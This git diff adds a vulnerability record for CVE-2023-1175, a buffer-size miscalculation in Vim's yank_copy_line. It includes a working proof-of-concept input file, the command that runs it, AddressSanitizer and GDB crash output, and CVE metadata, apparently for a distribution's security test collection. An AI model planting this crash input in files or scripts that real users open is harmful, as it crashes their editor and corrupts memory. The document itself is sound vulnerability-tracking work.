diff --git a/cve/vim/2023/CVE-2023-1175/README.md b/cve/vim/2023/CVE-2023-1175/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..eba25fc4197ea6a033ac3c0eb05bdd42a9e225c2
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1175/README.md
@@ -0,0 +1,134 @@
+## Description
+Incorrect Calculation of Buffer Size in function yank_copy_line at register.c:1468
+## vim version
+```bash
+git log
+commit 657aea7fc47fb919ce76fad64ba0ec55a1af80f1 (HEAD -> master, tag: v9.0.1249, origin/master, origin/HEAD)
+```
+## POC
+```bash
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
+=================================================================
+==1962298==ERROR: AddressSanitizer: negative-size-param: (size=-1)
+    #0 0x7ffff75eafdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
+    #1 0x5555562c58ad in yank_copy_line /home/fuzz/vim/src/register.c:1468
+    #2 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+    #3 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+    #4 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+    #5 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+    #6 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+    #7 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+    #8 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+    #9 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+    #10 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #11 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #12 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+    #13 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+    #14 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+    #15 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+    #16 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #17 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #18 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+    #19 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+    #20 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+    #21 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
+    #22 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
+    #23 0x55555569724d in _start (/home/fuzz/vim/src/vim+0x14324d)
+
+0x602000007270 is located 0 bytes inside of 2-byte region [0x602000007270,0x602000007272)
+allocated by thread T0 here:
+    #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
+    #1 0x555555697ed6 in lalloc /home/fuzz/vim/src/alloc.c:246
+    #2 0x55555569767e in alloc /home/fuzz/vim/src/alloc.c:151
+    #3 0x5555562c5715 in yank_copy_line /home/fuzz/vim/src/register.c:1464
+    #4 0x5555562c35bd in op_yank /home/fuzz/vim/src/register.c:1290
+    #5 0x555555f96baf in op_delete /home/fuzz/vim/src/ops.c:742
+    #6 0x555555fa95b9 in op_change /home/fuzz/vim/src/ops.c:1754
+    #7 0x555555fd2498 in do_pending_operator /home/fuzz/vim/src/ops.c:4123
+    #8 0x555555f29d64 in normal_cmd /home/fuzz/vim/src/normal.c:960
+    #9 0x555555b1bb27 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+    #10 0x555555b1b4bc in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+    #11 0x555555b1a404 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+    #12 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #13 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #14 0x55555633c1ab in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+    #15 0x55555633e9aa in do_source /home/fuzz/vim/src/scriptfile.c:1905
+    #16 0x5555563370a2 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+    #17 0x5555563371fb in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+    #18 0x555555abe320 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #19 0x555555aa6864 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #20 0x555555aa25cd in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+    #21 0x555556adfa19 in exe_commands /home/fuzz/vim/src/main.c:3146
+    #22 0x555556ac9ab9 in vim_main2 /home/fuzz/vim/src/main.c:782
+    #23 0x555556ac6f8f in main /home/fuzz/vim/src/main.c:433
+    #24 0x7ffff71f9082 in __libc_start_main ../csu/libc-start.c:308
+
+SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
+==1962298==ABORTING
+```
+[poc_nsp01_s.dat](poc_nsp01_s.dat)
+## GDB
+```bash
+gdb --args ./vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_nsp01_s.dat -c :qa!
+
+─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[Thread debugging using libthread_db enabled]
+Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
+
+Breakpoint 1, yank_copy_line (bd=0x7fffffffbc20, y_idx=0, exclude_trailing_space=0) at register.c:1468
+1468        vim_memset(pnew, ' ', (size_t)bd->startspaces);
+─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 0x00005555562c5854  yank_copy_line+883 je     0x5555562c585e <yank_copy_line+893>
+ 0x00005555562c5856  yank_copy_line+885 mov    %rdx,%rdi
+ 0x00005555562c5859  yank_copy_line+888 callq  0x555555696b30 <__asan_report_store8@plt>
+ 0x00005555562c585e  yank_copy_line+893 mov    -0x18(%rbp),%rdx
+ 0x00005555562c5862  yank_copy_line+897 mov    %rdx,(%rax)
+!0x00005555562c5865  yank_copy_line+900 mov    -0x28(%rbp),%rax
+ 0x00005555562c5869  yank_copy_line+904 mov    %rax,%rdx
+ 0x00005555562c586c  yank_copy_line+907 mov    %rdx,%rax
+ 0x00005555562c586f  yank_copy_line+910 shr    $0x3,%rax
+ 0x00005555562c5873  yank_copy_line+914 add    $0x7fff8000,%rax
+─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[1] break at 0x00005555562c5865 in register.c:1468 for /home/fuzz/vim/src/register.c:1468 hit 1 time
+─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+     rax 0x0000602000007230        rbx 0x0000555556d935e0     rcx 0x0000000000000000     rdx 0x0000602000007250     rsi 0x0000000000000000     rdi 0x0000000000000000     rbp 0x00007fffffffbb00     rsp 0x00007fffffffbac0
+      r8 0x00007ffff7fb8000         r9 0x0000000000000002     r10 0x0000602000007240     r11 0x00000000000000e0     r12 0x00007fffffffbd30     r13 0x00000ffffffff772     r14 0x00007fffffffbb90     r15 0x0000555556d86b60
+     rip 0x00005555562c5865     eflags [ PF ZF IF ]            cs 0x00000033              ss 0x0000002b              ds 0x00000000              es 0x00000000              fs 0x00000000              gs 0x00000000        
+─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ 1463      bd->endspaces = 0;
+ 1464      if ((pnew = alloc(bd->startspaces + bd->endspaces + bd->textlen + 1))
+ 1465                                        == NULL)
+ 1466      return FAIL;
+ 1467      y_current->y_array[y_idx] = pnew;
+!1468      vim_memset(pnew, ' ', (size_t)bd->startspaces);
+ 1469      pnew += bd->startspaces;
+ 1470      mch_memmove(pnew, bd->textstart, (size_t)bd->textlen);
+ 1471      pnew += bd->textlen;
+ 1472      vim_memset(pnew, ' ', (size_t)bd->endspaces);
+─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[0] from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468
+[1] from 0x00005555562c35be in op_yank+11347 at register.c:1290
+[2] from 0x0000555555f96bb0 in op_delete+8257 at ops.c:742
+[3] from 0x0000555555fa95ba in op_change+1153 at ops.c:1754
+[4] from 0x0000555555fd2499 in do_pending_operator+44344 at ops.c:4123
+[5] from 0x0000555555f29d65 in normal_cmd+21183 at normal.c:960
+[6] from 0x0000555555b1bb28 in exec_normal+1640 at ex_docmd.c:8887
+[7] from 0x0000555555b1b4bd in exec_normal_cmd+73 at ex_docmd.c:8850
+[8] from 0x0000555555b1a405 in ex_normal+5241 at ex_docmd.c:8768
+[9] from 0x0000555555abe321 in do_one_cmd+59341 at ex_docmd.c:2580
+[+]
+─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+[1] id 1972438 name vim from 0x00005555562c5865 in yank_copy_line+900 at register.c:1468
+─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+arg bd = 0x7fffffffbc20: {startspaces = -1,endspaces = 2,textlen = 0,textstart = 0x621000009cff "",t…, y_idx = 0, exclude_trailing_space = 0
+loc pnew = 0x602000007250 "\276\276": 190 '\276'
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+>>> p bd->startspaces
+$2 = -1
+>>> 
+```
+## Impact
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-1175/poc_nsp01_s.dat b/cve/vim/2023/CVE-2023-1175/poc_nsp01_s.dat
new file mode 100644
index 0000000000000000000000000000000000000000..ee7f2853ebd3226dcd5f905c35dd02fab51ee75b
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1175/poc_nsp01_s.dat
@@ -0,0 +1,3 @@
+se ve=all
+sil0norm0a0
+sil!norm0o00000��0k<a0s
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-1175.yaml b/cve/vim/2023/yaml/CVE-2023-1175.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..3bff82c3d122e12110d45b6145c8cec44eda538b
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-1175.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-1175
+source: https://huntr.dev/bounties/7e93fc17-92eb-4ae7-b01a-93bb460b643e/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: medium
+  description: |
+    Incorrect Calculation of Buffer Size in GitHub repository vim/vim prior to 9.0.1378.
+  scope-of-influence:
+    vim < 9.0.1378
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1175
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H
+    cvss-score: 6.6
+    cve-id: CVE-2023-1175
+    cwe-id: CWE-131
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 缓冲区大小计算错误
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index e5495c407d72ddeb60d03a6c02759cc4d7de57ca..9ebb7a706b6882c00a4bc03b9afc1c694577673e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -109,6 +109,7 @@ cve:
     - CVE-2023-0054
     - CVE-2023-0512
     - CVE-2023-1127
+    - CVE-2023-1175
   openssl:
     - CVE-2022-1292
     - CVE-2022-2274